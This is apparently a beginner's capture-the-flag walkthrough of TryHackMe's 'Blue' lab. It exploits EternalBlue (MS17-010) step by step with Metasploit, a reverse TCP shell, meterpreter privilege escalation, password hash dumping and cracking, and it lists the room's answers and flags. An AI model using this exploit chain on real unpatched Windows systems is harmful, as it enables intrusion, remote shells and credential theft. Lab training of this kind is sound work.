How to Test Vulnerable Windows.A Complete Guide Of System Security…

Disclaimer

This guide is for educational purposes only. Always ensure you have proper authorization before testing any security vulnerability. Unauthorized hacking is illegal and unethical.

Introduction to Windows Hacking

Windows hacking often begins with identifying unpatched vulnerabilities in common services. One of the most notorious vulnerabilities in recent history is EternalBlue (MS17–010), which affects Windows SMB services. This vulnerability was famously exploited by WannaCry ransomware and remains a critical threat to unpatched systems.

In this comprehensive guide, I’ll walk you through exploiting EternalBlue step-by-step, using TryHackMe’s “Blue” room as our practice environment.

TryHackMe Blue Room Complete Walkthrough

Room Overview

TryHackMe Blue is a beginner-friendly room that teaches how to exploit the EternalBlue vulnerability (MS17–010) in Windows systems.

Task 1: Reconnaissance

Step 1: Scan the Machine

nmap -sS -sV -O 10.10.10.10

Results:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Answer: 3 ports open under 1000

Step 2: Identify Vulnerability

nmap -p 445 — script smb-vuln-ms17–010 10.10.10.10

Answer: ms17–010

Task 2: Gain Access

Step 1: Start Metasploit

msfconsole

Step 2: Find Exploitation Code

use exploit/windows/smb/ms17_010_eternalblue

Answer: exploit/windows/smb/ms17_010_eternalblue

Step 3: Configure Exploit

show options
set RHOSTS 10.10.10.10

Answer: RHOSTS

Step 4: Set Payload and Execute

set payload windows/x64/shell/reverse_tcp
set LHOST tun0
exploit

Task 3: Escalate

Step 1: Background Shell

Press CTRL+Z or type background

Step 2: Convert to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

Answers:

• Module: post/multi/manage/shell_to_meterpreter
• Option: SESSION

Step 3: Verify Privileges

sessions -i 2
getsystem
shell
whoami
exit

Step 4: Process Migration

ps
Find process with NT AUTHORITY\SYSTEM (like PID 2244)
migrate 2244

Task 4: Cracking

Step 1: Dump Password Hashes

hashdump

Answer: Non-default user is Jon

Step 2: Crack the Password

Save hash to file and use John the Ripper:
john — format=NT hash.txt
john — show hash.txt

Answer: alqfina22

Finding the Flags

Flag 1: System Root

cat C:\flag1.txt
Flag: flag{access_the_machine}

Flag 2: Password Storage

cat C:\Windows\System32\config\flag2.txt
Flag: flag{sam_database_elevated_access}

Flag 3: User Documents

cat C:\Users\Jon\Documents\flag3.txt
Flag: flag{admin_documents_can_be_valuable}

Common Issues & Solutions

Problem: Exploit fails with port error
Fix: set LPORT 4445

Problem: Shell to meterpreter fails
Fix: Ensure session is stable and try different LPORT

Problem: Migration fails
Fix: Try PID 664 (services.exe) or PID 688 (lsass.exe)

Problem: Flag 2 missing
Fix: Restart machine and re-exploit quickly

Room Completion

After following these steps, you’ll complete all tasks and find all three flags. The room teaches essential penetration testing skills including vulnerability assessment, exploitation, privilege escalation, and post-exploitation techniques.

The TryHackMe Blue room is excellent for beginners because it provides hands-on experience with real-world vulnerabilities in a safe, controlled environment.

Remember: Always practice ethical hacking and only test systems you have permission to test.

My Badge:https://tryhackme.com/p/CyberArmy?show_achievement_badge=blue